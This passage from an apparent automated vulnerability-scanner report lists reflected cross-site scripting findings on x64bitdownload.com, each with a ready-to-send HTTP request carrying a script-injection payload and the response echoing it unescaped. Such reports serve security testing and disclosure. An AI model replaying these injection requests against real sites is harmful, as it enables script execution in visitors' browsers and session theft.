User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-client-downloads.html?3709f"><script>alert(1)</script>5d317c2536e=1" />
...[SNIP]...

4.1597. http://www.x64bitdownload.com/64-bit-rss-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d337e"><script>alert(1)</script>9b144cad06d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-downloads.htmld337e"><script>alert(1)</script>9b144cad06d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88551


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-downloads.htmld337e"><script>alert(1)</script>9b144cad06d" />
...[SNIP]...

4.1598. http://www.x64bitdownload.com/64-bit-rss-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a417"><script>alert(1)</script>14bc0d3550a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-downloads.html?4a417"><script>alert(1)</script>14bc0d3550a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-downloads.html?4a417"><script>alert(1)</script>14bc0d3550a=1" />
...[SNIP]...

4.1599. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-feed-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d26"><script>alert(1)</script>9a97b43768b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-feed-reader-downloads.html33d26"><script>alert(1)</script>9a97b43768b HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93760


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-feed-reader-downloads.html33d26"><script>alert(1)</script>9a97b43768b" />
...[SNIP]...

4.1600. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-feed-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12de"><script>alert(1)</script>770277e5ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-feed-reader-downloads.html?f12de"><script>alert(1)</script>770277e5ab7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93763


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-feed-reader-downloads.html?f12de"><script>alert(1)</script>770277e5ab7=1" />
...[SNIP]...

4.1601. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2159a"><script>alert(1)</script>7cc8e154fd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-reader-downloads.html2159a"><script>alert(1)</script>7cc8e154fd6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-reader-downloads.html2159a"><script>alert(1)</script>7cc8e154fd6" />
...[SNIP]...

4.1602. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d02c9"><script>alert(1)</script>494377cbd72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-reader-downloads.html?d02c9"><script>alert(1)</script>494377cbd72=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-reader-downloads.html?d02c9"><script>alert(1)</script>494377cbd72=1" />
...[SNIP]...

4.1603. http://www.x64bitdownload.com/64-bit-search-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-search-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f19f4"><script>alert(1)</script>42c8e9318d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-search-downloads.htmlf19f4"><script>alert(1)</script>42c8e9318d8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-search-downloads.htmlf19f4"><script>alert(1)</script>42c8e9318d8" />
...[SNIP]...

4.1604. http://www.x64bitdownload.com/64-bit-search-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-search-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bf0d"><script>alert(1)</script>f1422490e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-search-downloads.html?4bf0d"><script>alert(1)</script>f1422490e1a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92026


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-search-downloads.html?4bf0d"><script>alert(1)</script>f1422490e1a=1" />
...[SNIP]...

4.1605. http://www.x64bitdownload.com/64-bit-ssl-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ssl-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 378a5"><script>alert(1)</script>edb593753a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ssl-downloads.html378a5"><script>alert(1)</script>edb593753a9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ssl-downloads.html378a5"><script>alert(1)</script>edb593753a9" />
...[SNIP]...

4.1606. http://www.x64bitdownload.com/64-bit-ssl-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ssl-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d45f"><script>alert(1)</script>fb73e15ccb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ssl-downloads.html?7d45f"><script>alert(1)</script>fb73e15ccb4=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87867


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ssl-downloads.html?7d45f"><script>alert(1)</script>fb73e15ccb4=1" />
...[SNIP]...

4.1607. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronization-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42925"><script>alert(1)</script>83516ad106d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-synchronization-downloads.html42925"><script>alert(1)</script>83516ad106d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90163


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-synchronization-downloads.html42925"><script>alert(1)</script>83516ad106d" />
...[SNIP]...

4.1608. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronization-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa26d"><script>alert(1)</script>59dfdd435a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-synchronization-downloads.html?aa26d"><script>alert(1)</script>59dfdd435a1=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90166


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-synchronization-downloads.html?aa26d"><script>alert(1)</script>59dfdd435a1=1" />
...[SNIP]...

4.1609. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronize-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d90"><script>alert(1)</script>34e92339c0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-synchronize-downloads.html?72d90"><script>alert(1)</script>34e92339c0f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-synchronize-downloads.html?72d90"><script>alert(1)</script>34e92339c0f=1" />
...[SNIP]...

4.1610. http://www.x64bitdownload.com/64-bit-troll-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-troll-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d4c"><script>alert(1)</script>b3d1287dd66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-troll-downloads.html?b2d4c"><script>alert(1)</script>b3d1287dd66=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-troll-downloads.html?b2d4c"><script>alert(1)</script>b3d1287dd66=1" />
...[SNIP]...

4.1611. http://www.x64bitdownload.com/64-bit-use-next-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-use-next-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5baa0"><script>alert(1)</script>4b3b5d06ac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-use-next-downloads.html5baa0"><script>alert(1)</script>4b3b5d06ac5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:32 GMT
Cache-Control: max-age=600
Pragma: cache
